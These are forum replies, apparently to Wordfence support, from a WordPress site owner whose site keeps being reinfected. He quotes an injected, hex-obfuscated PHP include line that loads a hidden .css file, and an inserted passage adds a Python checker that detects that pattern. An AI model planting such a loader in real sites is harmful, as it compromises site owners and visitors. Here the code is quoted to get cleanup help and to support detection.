lubos55
Forum Replies Created
Hello.
Something’s not working.
The audit log does not contain any activity related to file changes that were later identified by the scanner on 11/25 at 01:04 AM.
/home/html/hudbaaslovo.cz/public_html/wp-includes/load.php
/home/html/hudbaaslovo.cz/public_html/index.php
/home/html/hudbaaslovo.cz/public_html/wp-includes/blocks/post-featured-image/.42ce3e21.css
How is that possible?
I managed to find the file edbabcd24d9f0a8d28cfbde8e011bbd3.avi, which did not contain a video, but a ZIP. The ZIP contained an older backup of the site with the infected files mentioned above.
The infection consisted of code injection and .css style placement.
Code:
/*3516e*/ $rcyul = "/ho\x6de/ht\x6dl/hudbaaslovo.cz/public_ht\x6dl/wp\x2dincludes/blocks/post\x2dfeatured\x2di\x6dage/.42ce3e21.css"; if (!isset($rcyul)) {md5 ($rcyul);} else { @include_once /* 81 */ ($rcyul); } /*3516e*/
This code is just an example. The code varies with each change.
Deleting the .css and .avi files and removing some of the code from the .php files on 11/24 did not help, as the infection reappeared on the morning of 11/25.
Last night (24.11) I thought that the site was already clean and so I asked Eset to remove our site hudbaaslovo.cz from the blacklist. However, I got a negative answer because the site is still infected. I am attaching a detailed infection report:
https://sitecheck.sucuri.net/results/hudbaaslovo.cz
Can I rely on this document to update the Wordfence signatures, and will I be able to clean the site with the support of your scan?
Thank you for your help
Luboš
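As an added example (not from the forum post and not Wordfence's own code), a small Python checker for the pattern in the injected fragment above: it resolves the `\xNN` escapes PHP allows in double-quoted strings so the real path becomes readable, then flags any `include_once`/`require` of a variable whose decoded value is a hidden file or a non-.php file. The sample input is a constructed copy of that fragment; the variable and path it uses are the ones quoted in the post.

```python
import re

# Constructed sample of the injected fragment described in the post (not read from
# the live site): a hex-escaped path to a hidden .css file pulled in via include_once.
SAMPLE_INJECTION = (
    '/*3516e*/ $rcyul = "/ho\\x6de/ht\\x6dl/hudbaaslovo.cz/public_ht\\x6dl/'
    'wp\\x2dincludes/blocks/post\\x2dfeatured\\x2di\\x6dage/.42ce3e21.css"; '
    'if (!isset($rcyul)) {md5 ($rcyul);} else { @include_once /* 81 */ ($rcyul); } /*3516e*/'
)

# PHP double-quoted strings accept \x followed by one or two hex digits.
HEX_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{1,2})')
# $name = "literal";  (literal may contain backslash escapes)
STRING_ASSIGN = re.compile(r'\$(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"')
# include/require(_once) of a variable, tolerating an @ and inline /* */ comments
INCLUDE_OF_VAR = re.compile(
    r'@?(?:include|require)(?:_once)?\s*(?:/\*.*?\*/\s*)*\(?\s*\$(\w+)')


def decode_php_hex(literal):
    """Resolve \\xNN escapes so an obfuscated path reads as the file it really names."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), literal)


def find_suspicious_includes(php_source):
    """Return (variable, decoded_path, reasons) for each include of a string variable
    that is hex-escaped, points at a hidden file, or has a non-.php extension."""
    raw_literals = dict(STRING_ASSIGN.findall(php_source))
    findings = []
    for var in INCLUDE_OF_VAR.findall(php_source):
        raw = raw_literals.get(var)
        if raw is None:
            continue  # included path not a simple string literal; out of scope here
        path = decode_php_hex(raw)
        basename = path.rsplit('/', 1)[-1]
        reasons = []
        if HEX_ESCAPE.search(raw):
            reasons.append("hex-escaped path literal")
        if basename.startswith('.'):
            reasons.append("hidden file")
        if not basename.lower().endswith('.php'):
            reasons.append("non-PHP extension included as code")
        if reasons:
            findings.append((var, path, reasons))
    return findings


if __name__ == "__main__":
    for var, path, reasons in find_suspicious_includes(SAMPLE_INJECTION):
        print(f"${var} -> {path}: {', '.join(reasons)}")
```

Run over the site's .php files, the decoded path also tells you which hidden file to inspect and remove alongside the injected loader.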
I looked at the audit log for the last month and there is not a single event. Does that mean the hacker cleaned up after himself?
Luboš
I am not aware of any active redirects outside of hudbaaslovo.cz. However, I am aware of a problem related to another attack that took place at the end of August. At that time, our site was exploited for apparently illegal Casino related games. The site was cleaned by a specialized company. To this day, however, there are attempts to contact the defunct site.
Google Search Console shows me that we have 1,464 pages that are not indexed and have a status of (Not Found 404).
Examples:
https://hudbaaslovo.cz/2024/08/21/guru-casino-bonus-bez-vkladu-50-free-spins/
https://hudbaaslovo.cz/2024/08/21/automaty-honey-honey-honey-online-zdarma/
https://hudbaaslovo.cz/2024/08/21/automaty-floating-dragon-hold-and-spin-online-zdarma/
As for the redirects, it’s the same cause. Someone has saved a non-existent page in their bookmarks and is trying to contact the non-existent page. There are 44 of these cases. I have checked these pages individually to see if there are any active redirects left. The result of my check is that there are no redirects outside of hudbaaslovo.cz.
Examples:
https://hudbaaslovo.cz/?p=4165
https://hudbaaslovo.cz/?p=3770
Thank you for the advice.
Luboš
Thanks for the advice. I applied some of them before I wrote this post. I also checked users and plugins. For plugins, I have a problem with the “Meta pixel for WordPress” plugin not being active. There could be a connection to the attack, but it can’t be uninstalled. Would you have any advice on how to get rid of this plugin? Can I cancel it via FTP access?
I am not able to search for suspicious files myself. I rely on Scan Wordfence and with its help I have been able to clean the site so far. I am surprised, however, that new findings of suspicious files appear after some time. In part, these are indeed new files in terms of Scan. My explanation is that these are new vulnerabilities that correspond to new signatures. However, I can’t explain that even files that I patched hours/days ago have been changed.
To explain. The numbers I have given in the text represent the date. For 7.11. (November 7) I forgot ‘.’.
Luboš